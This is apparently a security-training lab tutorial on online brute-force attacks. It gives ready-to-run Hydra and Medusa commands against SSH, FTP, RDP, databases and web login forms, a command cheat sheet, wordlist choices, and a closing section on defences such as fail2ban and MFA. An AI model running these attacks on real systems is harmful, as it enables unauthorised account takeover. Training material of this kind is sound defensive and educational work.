๐ฏ Lab Objectives
- Understand what brute-force and credential-stuffing attacks are
- Use Hydra to attack SSH, FTP, and web login forms
- Choose the right wordlist for the target
- Understand how defenders detect and stop these attacks
Only run Hydra against systems you own or have explicit written permission to test. Unauthorised brute-force attacks are illegal in most countries.
Step 1 โ How Hydra Works
Hydra tries username/password combinations against a live service as fast as possible. It supports 50+ protocols including SSH, FTP, HTTP, SMTP, RDP, MySQL, and more.
# Hydra basic syntax
hydra [OPTIONS] TARGET SERVICE
# Key flags:
-l username โ single username
-L file.txt โ list of usernames
-p password โ single password
-P file.txt โ list of passwords (wordlist)
-t 4 โ number of parallel tasks (threads)
-f โ stop after first valid login found
-V โ verbose (show each attempt)
-o output.txt โ save results to file
Step 2 โ SSH Brute Force
# Single username, password list
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
# Username list + password list
hydra -L users.txt -P passwords.txt ssh://192.168.1.10
# Try common passwords on many usernames
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
-P /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt \
-t 4 -f ssh://192.168.1.10
# Custom port
hydra -l root -P rockyou.txt -s 2222 ssh://192.168.1.10
# Successful result looks like:
[22][ssh] host: 192.168.1.10 login: admin password: password123
Step 3 โ FTP Brute Force
# FTP brute force
hydra -l ftp -P rockyou.txt ftp://192.168.1.10
# Try anonymous login first (before brute-forcing)
ftp 192.168.1.10
# Username: anonymous
# Password: (blank or your@email.com)
# Other common services
hydra -l admin -P rockyou.txt telnet://192.168.1.10
hydra -l admin -P rockyou.txt smtp://192.168.1.10
hydra -l root -P rockyou.txt mysql://192.168.1.10
Step 4 โ HTTP Login Form Brute Force
This is trickier โ you need to identify the form parameters and what a failed login looks like.
# Step 1: Find the form fields using browser DevTools or Burp Suite
# Right-click login form โ Inspect โ look for input names
# e.g. username=admin&password=test
# HTTP POST form โ http-post-form module
# Format: "PATH:BODY:FAIL_STRING"
hydra -l admin -P rockyou.txt 192.168.1.10 \
http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
# ^USER^ and ^PASS^ are Hydra's placeholders
# "Invalid credentials" = text that appears on FAILED login
# HTTP GET form (less common)
hydra -l admin -P rockyou.txt 192.168.1.10 \
http-get-form "/login?user=^USER^&pass=^PASS^:F=Login failed"
# HTTP Basic Authentication (pop-up login box)
hydra -l admin -P rockyou.txt http-get://192.168.1.10/admin
Step 5 โ Choosing the Right Wordlist
# Location of wordlists on Kali
ls /usr/share/wordlists/
ls /usr/share/seclists/
# Install SecLists (comprehensive collection)
sudo apt install seclists -y
# Recommended wordlists by use case:
# Quick test (top passwords):
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
# SSH / general service:
/usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt
# Full rockyou (14 million, slow):
/usr/share/wordlists/rockyou.txt
# Usernames:
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/usr/share/seclists/Usernames/Names/names.txt
# Generate custom wordlist with crunch
crunch 6 8 abcdefghijklmnopqrstuvwxyz0123456789 -o custom.txt
# Generate from target keywords with cewl
cewl https://example.com -d 2 -m 5 -w cewl_wordlist.txt
Step 6 โ Medusa (Hydra Alternative)
# Medusa is another brute-force tool, faster on some protocols
sudo apt install medusa -y
# SSH brute force with Medusa
medusa -h 192.168.1.10 -u admin -P rockyou.txt -M ssh
# Multiple hosts from file
medusa -H hosts.txt -u admin -P rockyou.txt -M ftp -t 10
Step 7 โ Defence Against Brute Force
# How defenders stop brute-force attacks:
# 1. Account lockout โ lock account after N failed attempts
# fail2ban automatically blocks IPs after failures:
sudo apt install fail2ban
# /etc/fail2ban/jail.conf โ maxretry = 3, bantime = 3600
# 2. Rate limiting
# nginx limit_req_zone limits login attempts per IP per second
# 3. SSH key authentication (disable password auth)
# /etc/ssh/sshd_config:
# PasswordAuthentication no
# PubkeyAuthentication yes
# 4. Change default ports
# SSH on port 22 gets hammered constantly
# Moving to port 2222 reduces noise by 90%+
# 5. MFA / Two-Factor Authentication
# Even if password is found, attacker needs the second factor
๐ Hydra Cheat Sheet
| Service | Command |
|---|---|
| SSH | hydra -l user -P pass.txt ssh://TARGET |
| FTP | hydra -l user -P pass.txt ftp://TARGET |
| Telnet | hydra -l user -P pass.txt telnet://TARGET |
| HTTP POST | hydra TARGET http-post-form "/login:u=^USER^&p=^PASS^:F=failed" |
| HTTP Basic | hydra -l user -P pass.txt http-get://TARGET/admin |
| MySQL | hydra -l root -P pass.txt mysql://TARGET |
| RDP | hydra -l admin -P pass.txt rdp://TARGET |
| SMTP | hydra -l user -P pass.txt smtp://TARGET |
Lab Complete! You now know how to perform and defend against online brute-force attacks. Combine this with password cracking (offline) for a complete credential-attack toolkit.